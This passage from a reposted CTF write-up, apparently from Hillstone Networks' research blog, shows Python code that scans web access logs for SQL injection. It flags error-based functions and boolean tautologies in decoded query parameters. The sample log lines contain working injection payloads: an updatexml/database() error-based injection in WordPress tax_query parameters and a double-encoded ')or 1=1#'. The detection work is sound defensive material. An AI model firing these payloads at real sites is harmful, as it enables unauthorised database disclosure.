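    '&query_vars%5Btax_query%5D%5B1%5D%5Bfield%5D=term_taxonomy_id'
    '&query_vars%5Btax_query%5D%5B1%5D%5Binclude_children%5D=1'
    '&query_vars%5Btax_query%5D%5B1%5D%5Bterms%5D%5B1%5D=1)+or+updatexml(0x7e,concat(1,database()),0x7e)%23'
    ' HTTP/1.1" 500 512',
    '198.51.100.4 - - [10/Aug/2022:10:01:03 +0000] "GET /?s=hello+world HTTP/1.1" 200 8120',
    '203.0.113.7 - - [10/Aug/2022:10:01:05 +0000] "GET /index.php?id=1)%2520or%25201%253D1%2523 HTTP/1.1" 200 900',
]

def suspicious_params(request_target: str):
    """Return [(param, reason)] for query parameters whose decoded value carries an injection marker."""
    hits = []
    for name, value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        decoded = unquote_plus(unquote_plus(value))   # parse_qsl decoded once; this handles double encoding
        if ERROR_BASED_FN.search(decoded):
            hits.append((name, "error-based SQL function"))
        elif BOOLEAN_TAIL.search(decoded):
            hits.append((name, "boolean clause with comment terminator"))
    return hits

def scan_log(lines):
    """One alert per matching request, with the offending parameter names and the reasons."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m["path"])
        if hits:
            alerts.append({"ip": m["ip"], "status": int(m["status"]),
                           "params": [name for name, _ in hits],
                           "reasons": [reason for _, reason in hits]})
    return alerts
```

Only the request line is visible here; POST bodies are not in a standard access log, so for a form-encoded injection like this one the same `suspicious_params` function should be fed from the application's own request logging or a WAF that sees the body.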
       

Originally published on the WeChat public account 山石网科安全技术研究院 (Hillstone Networks Security Research Institute): 强网杯WriteUp|强网先锋 & Web

Disclaimer: the programs (methods) in this article may be offensive in nature and are provided only for security research and teaching. Readers who put this information to any other use bear full legal and related responsibility; this site accepts none. For questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).
Published by admin on 2025-01-06 13:23:07. Please keep this link when reposting (CN-SEC): https://cn-sec.com/archives/1216216.html